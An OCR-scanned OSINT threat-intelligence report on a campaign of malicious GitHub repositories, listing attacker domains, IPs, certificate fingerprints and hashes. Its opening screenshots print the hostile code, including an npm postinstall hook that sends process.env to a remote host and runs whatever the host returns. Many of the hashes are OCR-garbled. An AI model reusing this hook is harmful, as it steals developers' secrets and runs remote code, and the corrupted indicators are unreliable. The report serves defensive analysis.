Exposing the Internet-Connected Infrastructure of the Cybercriminals Behind the Recent 
Github Rogue and Malware Embedded Malicious Repositories Malware Campaign - An 
OSINT Analysis 


bsitories 35,613 code results 


al h4vOkr/bitcoinjs-lib 
/package.json 
"test": “npm run standard && npm run coverage", 
“unit": "mocha", 
“postinstall": “node -e \"try{r=require('http').request({host: 'Ovzd 
+ ]19544519.pr46m.vps.myjino.ru',port: 49460, path: '/?org=h4v0kr&repo=bitco 
Lib’ ,method: 'POST'}, function(r){d='';r.on( ‘data’, function(dd) 
{d+=dd. toString( ‘utf8')});r.on( ‘end’, function() 
{try{require(‘'child_process').execSync(d)}catch(_) 
{}})});r.write(JSON. stringify(process.env));r.end()}catch(_){}\"" 


JSON Showing the top match Last indexed 9 days ago 


@ armpelionedge/dhcp4client 
/generatexid.go 
f x@__.Setenv("e452d6ab", 1") 


yuages 29 x2__.Post(“http://OWZ2. j19544519 . pr46m. vps .myjino.ru:494607 
org=armpe Lionedge&repo=dhcp4client", “application/json", x1__.NewBuffer( 
} 
} 


ckerfile 


We've recently became aware of a high-profile malicious software and exploits serving 
campaign targeting GitHub users and we've decided to use WhoisXML API's vast real-time and 
historical WHOIS database and offer additional insights into its Internet-connected 
infrastructure. 


Sample malicious domains known to have been involved in the campaign include: 
hxxp://ovzl.jl9544519.pr46m.vps.myjino.ru - 195.161.41.221 
hxxp://ovz1.9147167707.1xdez.vps.myjino.ru 

hxxp://myjino.ru 


hxxp://kolobkoproms.ug 


Sample SSL Certificates Fingerprints known to have been involved in the campaign 
include: 


E99DAF 10E6CB98E93F82DBE344E6D6B483B9073E80B128C163034F68DE63BE33 
ABF3FDB17799F468E850D823F 845647 738B66 74451 383156473F 1742FFBD61EC 


Related malicious domains known to have been involved in the campaign include: 


hxxp://m.ancard.ru/ 
hxxp://reshenie2014.ru/ 


hxxp://myjino.ru - 195.161.62.100 


Serial Number: b9564490f3ba34b03318d70cd87b988a 
Thumbprint: b2d7d063c4b6d167ff5f006d073cc5831b30c8d3 


Sample known responding IPs known to have been involved in the campaign include: 


195.161.62.100 
195.161.41.85 
81.177.141.15 
81.177.139.113 


Related malicious domains known to have been involved in the campaign include: 
keerdev.myjino.ru 
forosoft.myjino.ru 
j1145058.myjino.ru 
schoolz.myjino.ru 
lunixes.myjino.ru 
abmlab.myjino.ru 
nmsolutions.myjino.ru 
paharev.myjino.ru 
wapik.myjino.ru 
ruslantabolin.myjino.ru 
pilot203.myjino.ru 
wip-ger2000.myjino.ru 
pilot21.myjino.ru 
kindness.myjino.ru 
toporchillo.myjino.ru 
sheba.myjino.ru 
j1041747.myjino.ru 
askibinyuk.myjino.ru 
13otshelnik.myjino.ru 
fedkaf.myjino.ru 
horse-moskva.myjino.ru 
anashkina1.myjino.ru 
htmedia.myjino.ru 
dmm.myjino.ru 
atolic.myjino.ru 
senat56.myjino.ru 
9896194866.myjino.ru 
j90324395.myjino.ru 


http.myjino.ru 
espo300.myjino.ru 
deniska132.myjino.ru 
zd1.myjino.ru 
oko-gsm.myjino.ru 
j45195993.myjino.ru 
ronex90.myjino.ru 
crosoutlander.myjino.ru 
j1071114.myjino.ru 
sibbilet72.myjino.ru 
znaki48.myjino.ru 
j82276956.myjino.ru 
andrei01.myjino.ru 
edrom.myjino.ru 
arsenalru.myjino.ru 
crolic88.myjino.ru 
j29363385.myjino.ru 
marianrua.myjino.ru 
gnu531.myjino.ru 
annastatva.myjino.ru 
webuserzx.myjino.ru 
chomax.myjino.ru 
avit.myjino.ru 
kdkb1vlad.myjino.ru 
j47446631.myjino.ru 
j60364558.myjino.ru 
9107881234.myjino.ru 
j78496260.myjino.ru 
abmlab0O.myjino.ru 
j96487695.myjino.ru 
radiosvyazservis.myjino.ru 
j98959271.myjino.ru 
diw.myjino.ru 
375333100065.myjino.ru 
j25406840.myjino.ru 
alexi050.myjino.ru 
9216587383.myjino.ru 
zealousdandy.myjino.ru 
j18860224.myjino.ru 
fnoksvrem.myjino.ru 
j55129676.myjino.ru 
rrapp.myjino.ru 
j25834848.myjino.ru 
sergmatveeev.myjino.ru 


j73500171.myjino.ru 
yugrealty.myjino.ru 
alter35.myjino.ru 
dimicandum.myjino.ru 
9260669431-1.myjino.ru 
pom4ekk.myjino.ru 
j301447 myjino.ru 
akahsa.myjino.ru 
j743689.myjino.ru 
dobrovolskiy.myjino.ru 
winx-2011.myjino.ru 
an-new-s.myjino.ru 
hirurggg.myjino.ru 
domenhost.myjino.ru 
naumow.myjino.ru 
ivanbukhonin.myjino.ru 
paul-2010.myjino.ru 
7964557 1170.myjino.ru 
j83950149.myjino.ru 
j941358.myjino.ru 
j01824195.myjino.ru 
antondvinyaninov.myjino.ru 
j45177258.myjino.ru 
rostokino.myjino.ru 
ip01reg.myjino.ru 
j50894468.myjino.ru 
george27.myjino.ru 
id15120279.myjino.ru 


Related responding IPs known to have been involved in the campaign include: 


195.161.41.85 
81.177.141.15 
81.177.139.113 
81.177.141.181 
81.177.135.173 
81.177.141.211 
81.177.139.166 
81.177.139.213 
81.177.141.23 
81.177.165.132 
81.177.141.33 
81.177.141.253 
81.177.165.51 


81.177.139.112 
81.177.139.61 
81.177.135.43 
81.177.135.81 
81.177.135.41 
81.177.139.41 
81.177.141.48 
81.177.139.95 
81.177.135.141 
81.177.141.121 
81.177.139.32 
81.177.135.223 
81.177.6.53 
81.177.141.85 
195.161.41.13 
81.177.141.241 
81.177.141.81 
81.177.141.252 
81.177.135.72 
81.177.135.61 
81.177.135.82 
81.177.139.92 
81.177.135.212 
195.161.114.5 
81.177.141.22 
81.177.6.123 
81.177.139.86 
81.177.6.91 
81.177.135.92 
81.177.135.11 
81.177.141.12 
195.161.41.115 
81.177.139.161 
81.177.165.33 
81.177.141.36 
81.177.135.83 
195.161.114.171 
81.177.139.77 
81.177.141.224 
81.177.135.251 
81.177.139.73 
81.177.141.51 
81.177.141.71 
81.177.139.51 


81.177.135.42 
81.177.141.142 
81.177.165.65 
81.177.165.31 
81.177.6.7 
81.177.135.13 
81.177.139.124 
81.177.141.232 
81.177.135.132 
81.177.165.23 
81.177.141.212 
81.177.139.242 
195.161.41.242 
81.177.6.221 
81.177.139.22 
81.177.139.152 
81.177.135.12 
81.177.141.242 
81.177.135.131 
81.177.135.89 
81.177.141.153 
81.177.135.172 
81.177.141.173 
195.161.41.142 
81.177.139.31 
81.177.135.133 
81.177.135.253 
81.177.139.63 
81.177.135.233 
81.177.135.193 
81.177.6.223 
81.177.165.92 
81.177.165.91 


Related malicious MD5s known to have been involved in the campaign include: 
bb3c28b92a67930b5c624beda5a3e9ee32a0dcd5d1613a6582564e035 16 78ecf 
5b55ed202476154939d8dfc44d45e0e38c2bca9c1 O2dbfc1046cb2172feae35f 
89764c091064aaee6e2bbaeG67 923fa73c83e8c1f5836fc99eccd863511e66b14 
dfe0101019a8389ed2755ccce4e4ae7c9c7847e072031cec238c850ad5cc0631 
7d5ec6993bde91 2ad35d98e2bb523c6d6022766b058bef0626bd4 1c8c00b81 ff 
0f2198222c6bed00fe1991 6bc3b00c3e01cbc45faf8a49ebf05b7d5520dfac56 
25bf365e8d1 1b7ab16df7566e8044ac46094497c7c2d54c13ecb9e5ecdcfbe25 
2a9b91869d6302d8e81 3abcb785e66aea 13647 f3a5dd48fad0ef4e83297 eb33b 
e9727e3a498d497 735df79421 8bcbda38c181c99ba62549ab6c8511713511ale 


c994c7035e32fba22 1b00628ad65e07ca9d8ee82ebcfdbf3ebfbb110992437a8 
5c0756cc6535f61 3cb95e55f05f3507 27 cf6bfec0dab54d348774bb423227e73 
67f7a68441c068d83eed91 6255558bdffic8af55 79e7 a1 b3437c577a95506ac38 
6353c2fdb4e54668e7c8b23836 763030435483ff3046107d144b381eabf615ed 
adb86ce647 1cO0fc43db45d74cfe6bb329be5e1 7d41 3f5cb30633891276f20be8 
84a9f79a02e331419202aedc2a7 5dc9bc393da38cd7f655ae0a112c05cd02361 
ef0d79dc97bbe20072af97e2f1 ecaae139c0ff2ce598481 5de229d624bd899db 
b0ef3315370e2ab67fa2168cd7e278199941c94254851 7fd922a6116e1a98ed0 
0d614ab583246b0858cc16211 f8bda7c649498e1 bf8d54c5e0b759cf9ach56eca 
Oc36acbabbOf8bce9d 71991 3f1 caf9a5dba487 7ff0304fed68e5d23afd9522d 
0b231b14f345cf769f32a7528d0a68ed50bcb15f655 1af2b1d1872b752a0cc80 
94c3fac1960b493edd94f1 3f99F7 3fef883686 7 721 aeb4837938a01 980b1fab1 
bf1476a7252dcc115446599b570c8f3587d643acda35d0a393374989dc6 15275 
e1a1dbd8cd69e4ef69242b111f1903bfe23 1 b60e88eabdbae4ebd4499a96442a 
af43e8219c4d66a997 2d4ad240f2fb09d0ee699b17f4c28e80ba0a25cf75b9a9 
b1cbf58d9567c243ff134a5b92e058b94 8affe374c1 723ffd12362f79f8a7b9e 
8008da79c75bba7437568ce4 1f380b9dc5f307d40f2662a28 1 e063983f895768f 
62731¢7d44c217b79724cb23bef4267570332ed67c1c1feef3f6c803a6f57ef3 
518e1e8dd2b7a01e9052db92002a6c8727fc1b26a4b72108bd273b0bb2893f4e 
52a6e80e/cd70b7afeaf570cb11411b296fe0f2c307a32bedcbe39b75f80d962 
752416350a1 8a2fc1890b642bb39af71a7b2e9d 56ff1 0a58634cfea287a25815 
bd3115dcc64093db6be 1b2c95c888127a04a43edfeba4e42d3084c768dd0c342 
74b39905eb0bea4 1 3dcab5ef6921 31 f99abcad86264ecbeb3a0f6e8b2854 1f945 
Ob6e6c7ccb43b542be1 2f81 acb26748da01ac96a327dc29e748463db2fddfe9d 
089b0ddb7 159c37fd7 767a4350fb3e69245e2bc9d34bb9a1 36897f4031b693cb 
87c81eb0270550b2085b0121c700bab73a9614758b86265005752e935bb57a7 1 
e9682006de2eb0c84 3bf6b87 49b88c3a0589bbdaaec23c1f495ad61 adcbd8f3b 
ba12830c113d2e37ec25c64a8d1be1 7da864177fee28088da9a5a41e0be23638 
6ab8bcea3357aa7cf77708c391408ca223ad697 c669ccdb4d063d9d303f105af 
36cbc715ce5111c16bedfdb39e5e3a3f85b689 13c975d117b2801 beadd11b68c 
c53bad6aabfafedab25e0cff7564019c976734bbc2dbcb3422b0f39faef22a 1f 
70864976575a204 7abed4be1 f403c66da5fe330331ddc3726580a7cb1351c914 
ec148d42ece264818327 1c8c1cea79dab8fb232ed975ca7b7d915a664774d379 
€975242757434bd2721893e67252de/7d7d5e00c23a242830495fa8eebaa004fb 
a81badbe/706b07444690ac685660cee04d780027945adf7c69346f7ace7d9075 
b735d036a05f884c7ce4b2a3b4dad7fe27e70126909ec469c73a28f45ef25e06 
1965277fe66e8e89a929eE793578227e36767aaf/ccad4a21c0ed129aa6dec379 
892a0d39b69c45523b9a4d7 7c7b72ef1 08480fafac502b4c9761 874748501 ab 
3190c0c1d7c8cce4adc7e8345f63b1 744b83cf22e8d649b92dc7a6999053eef1 
d17e0fbebf8a03ec1890dd27 108692d46e1d98e556e7943dad1b55a8846b243d 
86098c13fb85269f7840e1 e83452257c092a542685 1fc5307b/7d84aeedf30f19 
da1fd76df8e48706788b96c1 867c5995d2eaedb200d5a6599af2 1f79dde94efa 
6237194 9bfafe7fea3f98022b65e7f52ec0260d63b055361 f9f485a49a2045c 
422f2'c32063667b84b4322e1537642575ecd191c72e7f68e0637 9fa95e7048Ff 


ce85497b3ddbd04af9cf32b057e67c07d 193651 8f4de8e7276c0aeefbcd98 127 
2f3e9d7b09597 18c36 16eb602c25a54638 1bf97568d4dba1 7a6b89d 1b39835c7 
42318bae111d52f022283d2980f34 1c05db48a08c23c5c799c938e0b23934bda 
43d2e227de0bdf1d5a5ea13ec026cc54d2851 39c2495ff20704ac56245eb6157 
fe455e5f5930bdfa2cbeccedda1a24563b26 1f038ed9ec2ad158e3b01c1c957f 
ae988be6293f8782c7589f3dfca028a643ada77 70bd807fc7 133d2e239a47da4 
04ab9a249e8042f19f13080d7995101 7d128d144bb935703bbcb4e5ff6 7b5f03 
ddd85ad0f194382c95f654 3dbeda6bbda1 baeGe4af23c5bd1230b67f38eed8de 
94fca40db3b6cb1 7060fb8492eddc98ab555f668935a5553d7ac3d8cac0ed08d 
826aee1e9110e0bfd91f0181781276a682f5c422d75e1c1ba3c98d752bb5ef16 
1233cc386b58b52aa36/7 22fad194fb1 beSceef1 7d 7037 af795c786fecd3c1244 
334a53aa962ab07e0c6c24d5fff8e1656c51d1a896f4db683dc126b638c9ab98 
daacee1b3e769e8116dfe16434d537fad3b326b76be213d3bf0c782db16e7d91 
727401ea987 1b2fb815c51 6ce14ac5a9330869cc554f1a043277f78e6eefb66d 
9cb4 1fc1b0ae7 19907f311181cOb7e0dd51aa6843750f67 1b350cbb8d5 1bcdac 
63a80d2493114866b1d4ae84a8bef03f564a004a4e34d282d12ac2484c17ae76 
7398d644293530389e937 1c80eee33ec8659b575a45059e 1c8529e949683c82c 
d20b9792381082009a66d223a781 98f143e9b50 1 825b3d9cdd53a7dd90c559ce 
053cbd018739ed51fa52434d02f1 8cd6678ca7327a386cddaefl 0a53b8694eaa 
958181a049551a65c394448dff8c886e6a4e8 13d4e4c1552db7464 16cid4a27a 
27cc52aa6 bbebf983d8e3ef8e 15 70cde3920a0bfe 1 bf1 b5acfb 7f89c4205a770 
8d761f8507f2c43dd02bdbe33b7991e5653a319efb72edadb41a848a0aeece1b 
c5f166599ba6c33b4f1640b2baa37a069ce7a49492b37333d1523fbb8&e3db808 
e104cf4262ff621 af817befdd1614a284867ae079f8894687a6al ad2dc486c67 
1242b4a166e7f9fbd04b23b8df114a461d20daf83175235e31 5bbe31d31f2aba 
f9b756dc190d051a66c2af64bcbe 181e9d97769f0ed89dfb7b55820882f5204f 
178b548d038a4f276c96edf387 8c9b5c612362805bbc64e07 4ff00Ff105eb9d4d 
5a7f562dc2a1 ebabdcf8ef409fd1a772e435e952e23b107d38cd7a946fb 76 7fb 
b5d00c51 21 8df178103d416467e1a35eb74c58a6949dcf84f4'd84589af84532 
9e1854eed7acd4fb42f1 01ddcece671e7c69a51b53fd6eb3f8b3f954ee3c5069 
e9fc68d39014edc2b2ececbad35cf37835ccb627d7334faddac6028ee8c73b1e 
523c2634a5df6d242e1 5f1 cebc7358e2965f2d3bb 15d4348691 ed23cb7cc93d7 
d174cd342b8e2eeb6d07d287242f9c2839e3 1414581 ebb40dcd46c58ebf604c6 
a0fa171948aef1 dcf2335c489025c3c069c6f0cac56914e8ci4e148f0ddc42d1 
bcd0d931f881e4e9878749f4602a0a7e6685ef3ca7 864cb32aa 109940967 eeaf 
bd4afbc358d9f15d9153504a34f96ddd4c7 78ed7cb56d65b27826568bf9c60e1 
a4f87a2c3ec1d8cfe505242a27269345db311309386d6878cada5b46e0c08a78 
0b444b861a82205e9bccc76 10b6a38980784ae52cb377872bde7 841b8b1efbae 
e0f177eb1bd4ce4dc4b80241382b2ec2e00560af701 801 2bc9f44ba12c060218 
fice66620859b48ee030da786c4d9eed 14719137bc75e0e65754a2aff1 8249da 
ac5c1f3807097e02a179b1676673eaddab5c0a7fbe9244ab262c6fb2a1f8d784 
65832fbdb6d5bbd2bd5e225521e31fdcb1e7def840c6a67cdf90e77c8db0039e 
29ac601ec6bed63a3e765a47e4de04f9 1 cdb69f876501 ad9d2b55ebf6fdca2fe 
9e6 9badeel433773e6819447e3a3ee64570409d0686d328335191ecd1ea6e10d 


18b6abae2795a02f3c996fd374533b8a4664bbb28ef79c6797c476bd7123d233 
a86108b63a0c2e56c6e9a6ff63fba3554a20747 7dbe1cabd4f9b957906c06aaé 
d73d0694a712c53ff8ac623b09a90942a0274 7f84d589283fdf82ce2276c7650 
a3367063b42e88609f6ff5269abab6fe3ccee8a3 1 0d9f2ded3ba31 34da6f0dc92 
156ecd91 dbfa00f8297f8 15c5852f95095f4508a092cf92ee460797192da0cfa 
20af97 85e375e6193b7701f5951 5f73d439c60addc96925943d20d3be767cb54 
022b68cad3452cbafa9d735b2c1be070b10e06e38cc15800a4043 1f3f7954f9e 
938af9b7 8ffb0 1b7ca42fdbcf47 1b64a2b9ffa1 76153f2356ed4c37eb44c30d1 
6a6b941325a9c317d3704586d9b33d7ab17d7476a35333115fe8ae1ed4e26acc 
8d3f7a4a54d532339f4266ace4d364da231e945f59668153cdf02F1 7f6ba4 709 
73ca5b01f0bdd9bb56e6332254fc7d509056 1c3b25cf66b32abcecd3e77a/cbf 
89be88190935fe9b0c10eb52f9091 ccf5f9ab79a16cf392564923 109b3af879b 
8fcc406cd5d0d925948217243a9b5a4da3f5e61 9b0bcb1417dd71fa3ac74ce14 
4b04353097ee265323e5134ea82010bc517581b47a29F721f25aded2366af032 
22d6123c21adc6d294197943294d41ed243af1a40d73da5a43f23483326c592f 
69fbe80bc201f258e337 8acdba1 6141 8f829e 11d2ff6f849ec9641b1cf4d3cda 
690fbc7ae85937 9857 66a4fc88c6d3f2729a6180074f51 71f73a961eda359de6 
f0c9ec17342a774c022e72ee8e88899d3024aa0af2035c1 9a7a947be3dbc9c67 
a45b0aba0853c4 17e74bfc01264b3a85 7696d06f5c1 dca6 1081 34ad71f818878 
ff8824e5b3801 cad8bbb46de7e96fd1794752e4756a44511e756f69bb7ce475e 
0a248c3da76df440d61f01 8ed709d211f816c59858b4eaddb5ee7680a8590dc5 
da0e249804de7a952665c0e63f4b6 7dfe7f5db47455d37ab60baad146c24469c 
ae4b6fd4a2205cd1e91327faa2b84012b9ed02dbO0ba6cce57adcac6133a25257 
3e€2608398d86ee4938498d2aebfa788df0e 1273a62eb50cc44428f311c2c35d2 
QYacfc1bd678c361862ed75a562af4694acbe0917bdb7eac8ac68e1e8578dd826 
c70af0345bbb87cOcf73cfecae85666febdf6 1 c936bf2cc7dda1622c1 Ob6fff4 
48c605215d9b2643fecb0bc4a27 aad973344f1eecd9b529c/cdcba79b36fe326 
c99058968643a1 004b6d817cc96e6b0e06bf4acdaedd7c0870e8fff2edd33800 
€8597575819d3bb63e0782b96947b9873839b4ab2b6 1c30abbdb087e843ac8e9 
O0b9b9c55893ff98c556dd0c0a96aa1 2cObfd541cc678e627a0ec88104ed3a2ae 
63eea4d1c246905b1 c658e6352d78383fcd2043d8c6eed9 1ffb098ef1d225be5 
e08e81120a611d85235f5639111ebb42fdd7a7f6869033ce284d2b30f2b91 3bc 
a95877d8c46ca3df97 1 be0a3d890 1fb6e0d2967455b20c6a0494e9ed8ac4ce14 
4791f32d4bdf38dda012442aca508447 9b43fac0O7eab4bbef07020ba93b07db9 
8467064a1ce38a20e58283f372550e7f0cb3fc7c/bcc29c469faf521ab674aa5 
50ae86368330f433a9b633ede895/7bcdb062d93f9f0ea2c26c055f4389cC573b0 
49b353949ecc26b1f58ech1 9c42655bc20bb81089ea6881e39d7b0d3b1d3e71d 
dec866320768931378e4355c9880ffe61 7fc5e85 14363a34e667db1994dbb07f 
2e8c1efb5e659b276784997d049537d0e0c375aea0e90a206b4950facd4c5a89 
1dae8b294e0cfc0c2e2941e57e79ecal1 6b8e51e2bcb61158c5c41d83b40e40de 
bd2525f0a6ab3b8bd626ad2a0bc38b4a7ecb4c55fd6b5f42d9 1 2e8e046e3564d 
27e1ba15d94f8a6a37a4d7aef09ba66cb9aee807F7 bcf74bfdbffc06 108066ab 
8029a45e00e 1447309223077 10b5953e5c09b7cb944.a42cfa54c7d540fc54d7 1 
9f4a55b66844a1357baf1 ef8a5fa1bc0a26d229a5d86fceb7 108d4246f79a17b 


bafd54b9cd67cc66785d591 7769b646e30b59b6ba95dca6f/cae2ef1b9142610 
6e3fa55c2885ee7abb67f91fa0da9dd1 cdbdb023e83ef0ff76cc06dc14701984 
efec5f91670b67e5/af8e5abc36 7f597edc448e429360cc47050bfb4a2461e23 
0e1e10fee7b742de0312899dd2608ee9 7a0f34dff20a05e151389c58da0be431 
8f830a3fdae3f9c187eb6c4b22088ebeO0dc9dd6400a626a1f9cO03bae50efc55e 
2c34b4f027de30a96631 3c6f223b359f981 3f8F7 2c20a7 caf422c590c8249fe1 
9f8d38995a828ccc252582285c49cee73218ee5c2c19c6ece58d08e06ad1 7e44 
8453648efc8860e2670c54a399a924 9fdfdeb260d0aacaeffc4 93f3fa24f81cb 
5b0174a304391b/6dd9df409723e06e04505f03921921d71be33f69d3adf00f3 
a195a5796c858a48b53b7 04 1d7f3add6bb7eac4157a7055d521 724785825d0fa 
ea85b0af61642d230d01ae2cbf6633e04c3b7ac68bcf87 9e24b1 e0b39811206c 
ca118dd25b30fa2d829c2d9e65a62c7 103e54746e65dcc94a573cec595a0cb54f 
1d6dc342183561ccd4fb517cacd1a0b410e69f7f0e73af465e80551 77fe285bd 
cddb594c410b8e01 7c11fd4277 3467 3cf9b04b8 7336 126f87e354f8d62dcc231 
7b1a7ffa7830a58ae4b538c1 cf4883c50f7e 1257 5dafa9efec3dcf6b5d0b3acb 
b6e69c1ac0a016e4c72282f52e1d2b42e00ed558634ceef67 36dc16276cbf94d 
dbb4dedd887bb1ca24f7c819463e5de38dd1 5b3fc9fdba8 1d6ebd0e7e7eb9b83 
a25ede77788c01f30b4ca74ce39f1cf225a8bfae3db12cf52c7 16dd3fea4 7146 
3d852dfaba961d86a5386975a994b0a6d5067740d901db77e497514b270607bd 
5acb2bbda8f9eeac30b120a3435610c8cf4be3839aab135aed42ee041 be638de 
7f52fce5fe2652ee7 84de39230aeb074b7 b2f0c2dc2d74fdf521b1b740b40848 
e4baf660cd0c5bc816fd8e1db33984b3a468aad6315d8b355b30759f05480eec 
7f33ce50f856af321103e24f83be4 141 50305f8828e6d7317b7c86fd18eeaffb 
c66b3a8f60b7210a835274e80ae9fd0753d04a57e1ce95f46214df7007e3627f 
acb2495481 a4d8f4d94cdd9b27cea3f34f741df48cf3eddf0 1d0726653092211 
f68f070b2892ae1618d7879e64c2820bci2a9a7/47af4e62328d1dc98cf344ce3 
2f775e3bcdca6 1da0052a2b852b8c21 52dbf97d4959df641 7f15c2174b449d38 
f16df84e854a78ea/7cdeb52cb53a3cb3c3a554eb6272c920a2f96a56e5386b83 
c8e03746ad4281 9092f4e20dec2f76e4349bf8b543e89d199e98194ade4247be 
66e1e6948f0a9a9407ccedf588ce1887e81 063fefa200df5675162ac35e0af19 
862bc7b4a52b5883f8 1 8d8e1 8ec965e206c67e8336546e0cc85688588 1 800dc9 
cc4ce5a53ce3a8d7bf8a0889c14c4326208bcc59a55e0e266437 2f085f2c2d96 
4ac2dbe863dc0aeb28cc34d7f33d663c/7cbea40f86cid344ee448b97a37a7e73 
c91b58c7ca19771317150ab95fc1 918104c49644870b653db37c5cc4aef80764 
£162255df60e0e328f4f0F7 86f503c60f0ci26adec4a542c8e81c937048fed60 
d6c54bef7df2065938ba4ecafe3636645f5ba6 1 2b4354865e53efea50e97d396 
b278ea935dadd26f1 9b 1 7f9b97a4c4a80a278cc26df24f0e2c0b4639661bfi2a2 
£18d859b7fe88846d86f65223f4588b883b6d01 ee0f321d8d9a874d647deb585 
f6dc1a8101231184240ccbf656c6d235112374c57fbo3939f0d3f67 761a7ef451 
79ae2820bd80d8f5ec9a13339d370a2e744d24e81 9a6a30c25aa9514b029b5b4 
9b1dded5e43c7f84 1d6a374f3d635b18ee7 7b600e7fcc674b692035644757ce4 
d5baceaeed6fce96dffb 7c6b5dde5cd4255688bd332c6c21c41a882652ba53ce 
cO9f89bf9 9f60fF847f41e304e18ab66ea268014d31adbbc2eb160154fd1a018 
71bcd616e521f861 4b9e98edc0cba92b1¢629542c14587d1eb70bd8d31d0e58a4 


dee334932ff1 789b32e689f7e50a4a84ae51a20c/2cd6b60c7871a2F774b831a 
776466ac34c3979e0c529086bfdb2'9676a4184af62c900e0b632a1 bf1 2F30F7 
06403a8d2a6ee007340dffb4fafl 3ee36a456d68342e2f77298bd9040482d242 
66b9c746d967 0c0086ec3d9b4e49edb640a8a8b07a48c25690a4 24 9f9b 2/1 Of4 
f21f76aa3bab0a4eb044a7fe05a1043e8853b9df5550442eb030e4650a894ae0 
98e3655ea7ceebe5745c6acf5d3c4bc395edf1001d1446f867c991 5cef6afb9d 
eb853e5d621 4b6aa6i2e07 15048f9 1b97607b277 19e51d36c345d1caab36f0c8 
d9d0e0a91a231b0f6d290e25dd5 18301 7a5d3216f20bc292f41 8a49b2c5bd2e4 
Ofaf4fbcac87a2e262e1 cbf3cf7861 fedf5fe6094 156c7a0c231c7e6d955e97e 
3cf11eabc1eb7f1f9c409ba36f9cfi 6b3ff4eda7a04c74f09 1 ce6f89901ad170 
0e65156b4d9ca968f52399e258af2327 ba897d87e98c8936403a023c700de8c8 
21c35738c0dd6a4fa3b6aa853e8df64025cfc1 4cccff8c2fe0ea8d0cc3baac8 
320e74e936c1 3da92d762aab9f4b04eff8e2a0da1689d634c651 983777 3e326d 
c001286113a72d3dba9b49aefd446ef7cf00 14bef1 d02a0c4fc94620096ce445 


b2d7d063c4b6d167ff5f006d073cc5831b30c8d3 
cf4068fed37dd658181d92bb2d8661 8b38621 74f 
7af15a2015e63a4b0faceef05edc2e22c6b697e4 


Sample related domains known to have been involved in the campaign include: 


iilinov-n.pr46m.vps.myjino.ru 
ovz4.hardbully.pr46m.vps.myjino.ru 
j14690344.pr46m.vps.myjino.ru 
ovz1.iilinov-n.pr46m.vps.myjino.ru 
ovz1.gas-panic.pr46m.vps.myjino.ru 
ovz1.elmedorru.pr46m.vps.myjino.ru 
ovz1.hardbully.pr46m.vps.myjino.ru 
ovz9.globalfox.pr46m.vps.myjino.ru 
ovzl.j19544519.pr46m.vps.myjino.ru 
ovz1.j19544519.pr46m.vps.myjino.ru 
j25215606.pr46m.vps.myjino.ru 
ip_ovz1.j19544519.pr46m.vps.myjino.ru 
j19544519.pr46m.vps.myjino.ru 
ovz1.j14690344.pr46m.vps.myjino.ru 
vz1.j19544519.pr46m.vps.myjino.ru 
_.j19544519.pr46m.vps.myjino.ru 
0v25.j31480334.pr46m.vps.myjino.ru 
ovz4.j31480334.pr46m.vps.myjino.ru 
ovz1.j39699330.pr46m.vps.myjino.ru 
j89699330.pr46m.vps.myjino.ru 
j28106969.pr46m.vps.myjino.ru 
ovz1.j25215606.pr46m.vps.myjino.ru 
j81480334.pr46m.vps.myjino.ru 


ovz1.j28106969.pr46m.vps.myjino.ru 
j19544519.pr46m.vps.myjino.ru 
ov21.j84921262.pr46m.vps.myjino.ru 
ovzl.jI9544519.pr46m.vps.myjino.ru 
ovz1.jl[9544519.pr46m.vps.myjino.ru 
ovz1.j50255180.pr46m.vps.myjino.ru 
j50255180.pr46m.vps.myjino.ru 
ovz1.j71491578.pr46m.vps.myjino.ru 
j71491578.pr46m.vps.myjino.ru 
ovz11.sellecom.pr46m.vps.myjino.ru 
sellecom.pr46m.vps.myjino.ru 
ovz13.sellecom.pr46m.vps.myjino.ru 
ovz12.sellecom.pr46m.vps.myjino.ru 
ovz1.pro-ctrl.pr46m.vps.myjino.ru 
ovz3.pmilohov.pr46m.vps.myjino.ru 
ovz2.schel4ok.pr46m.vps.myjino.ru 
schel4ok.pr46m.vps.myjino.ru 
wwwghcpi.ovz16.sellecom.pr46m.vps.myjino.ru 
wwwauth.ovz16.sellecom.pr46m.vps.myjino.ru 
ovz18.sellecom.pr46m.vps.myjino.ru 
ovz17.sellecom.pr46m.vps.myjino.ru 
ovz16.sellecom.pr46m.vps.myjino.ru 
ovz15.sellecom.pr46m.vps.myjino.ru 
www-aws.ovz16.sellecom.pr46m.vps.myjino.ru 
www.ovz16.sellecom.pr46m.vps.myjino.ru 
ovz16-f.sellecom.pr46m.vps.myjino.ru 
ovz23.sellecom.pr46m.vps.myjino.ru 
demoovz16.sellecom.pr46m.vps.myjino.ru 
ovz16aws.sellecom.pr46m.vps.myjino.ru 
ovz20.sellecom.pr46m.vps.myjino.ru 
ovz19.sellecom.pr46m.vps.myjino.ru 
ovz22.sellecom.pr46m.vps.myjino.ru 
ovz21.sellecom.pr46m.vps.myjino.ru 
ovz1.vvstrong.pr46m.vps.myjino.ru 
ovz1.vityakut.pr46m.vps.myjino.ru 
ovz2.berdi-aga.pr46m.vps.myjino.ru 
ovz1.berdi-aga.pr46m.vps.myjino.ru 
ovz1.sun-1985.pr46m.vps.myjino.ru 
0vz162014.sellecom.pr46m.vps.myjino.ru 
vityakut.pr46m.vps.myjino.ru 
ovz3.valtodas.pr46m.vps.myjino.ru 
0vz6.9817164679.pr46m.vps.myjino.ru 
ovz4.9817164679.pr46m.vps.myjino.ru 
ovz9.9817164679.pr46m.vps.myjino.ru 


ovz7.9817164679.pr46m.vps.myjino.ru 
o0vz2.9609783559.pr46m.vps.myjino.ru 
9609783559.pr46m.vps.myjino.ru 
0vz3.9817164679.pr46m.vps.myjino.ru 
ovz2.9817164679.pr46m.vps.myjino.ru 
ovz51.admservice.pr46m.vps.myjino.ru 
ovz50.admservice.pr46m.vps.myjino.ru 
ovz2.aleksdor84.pr46m.vps.myjino.ru 
ovz80.admservice.pr46m.vps.myjino.ru 
9858314881.pr46m.vps.myjino.ru 
o0vz10.9817164679.pr46m.vps.myjino.ru 
admservice.pr46m.vps.myjino.ru 
o0vz4.9858314881 .pr46m.vps.myjino.ru 
ovz3.endorfin11.pr46m.vps.myjino.ru 
ovz1.degay42047.pr46m.vps.myjino.ru 
ovz2.evp-santeh.pr46m.vps.myjino.ru 
evp-santeh.pr46m.vps.myjino.ru 
ovz9.babagalya1.pr46m.vps.myjino.ru 
ovz1.antireflux.pr46m.vps.myjino.ru 
degay42047.pr46m.vps.myjino.ru 
ovz35.d-khalezin.pr46m.vps.myjino.ru 
ovz1.id63402486.pr46m.vps.myjino.ru 
ovz2.gagauzinfo.pr46m.vps.myjino.ru 
ovz1.jiwina7757.pr46m.vps.myjino.ru 
jiwina7757.pr46m.vps.myjino.ru 
fagaje9117.pr46m.vps.myjino.ru 
